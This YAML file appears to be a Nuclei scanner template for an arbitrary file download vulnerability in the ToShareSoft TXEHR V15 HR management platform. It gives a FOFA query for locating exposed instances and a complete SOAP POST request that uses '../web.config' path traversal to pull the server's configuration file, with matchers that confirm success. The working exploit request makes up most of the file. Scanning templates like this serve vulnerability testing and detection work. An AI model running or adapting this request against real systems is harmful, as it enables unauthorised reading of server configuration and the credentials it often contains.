id: tosharesoft-DownloadTemplate-filedownload
info:
  name: 同享人力管理管理平台 DownloadFile - filedownload
  author: leadlife
  severity: high
  description: 同享软件成立于1997年，运营中心位于东莞南城南新产业国际。专注研发和推广人力资源信息化产品，帮助企业构建统一的人力资源数智化平台，快速提高企业人才管理能力，提升人力资源管理效率，帮助员工快速成长，协助企业实现智慧决策。同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞
  reference: 
    - https://github.com/wy876/POC/blob/main/%E5%90%8C%E4%BA%AB%E4%BA%BA%E5%8A%9B%E7%AE%A1%E7%90%86%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0/%E5%90%8C%E4%BA%AB%E4%BA%BA%E5%8A%9B%E7%AE%A1%E7%90%86%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0DownloadFile%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/Assistant/Default.aspx"
    hunter-query: demo
  tags: tosharesoft,filedownload,hr

http:
  - raw:
      - |
        POST /Service/DownloadTemplate.asmx HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Connection: close
        Cookie: ASP.NET_SessionId=f40br0ilcoosnxgllqrmltkd
        Upgrade-Insecure-Requests: 1
        Priority: u=1
        SOAPAction: http://tempuri.org/DownloadFile
        Content-Type: text/xml;charset=UTF-8
        Host: {{Hostname}}
        Content-Length: 310

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
          <soapenv:Header/>
          <soapenv:Body>
              <tem:DownloadFile>
                <!--type: string-->
                <tem:path>../web.config</tem:path>
              </tem:DownloadFile>
          </soapenv:Body>
        </soapenv:Envelope>
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'/DownloadFileResult','xml version')
        condition: and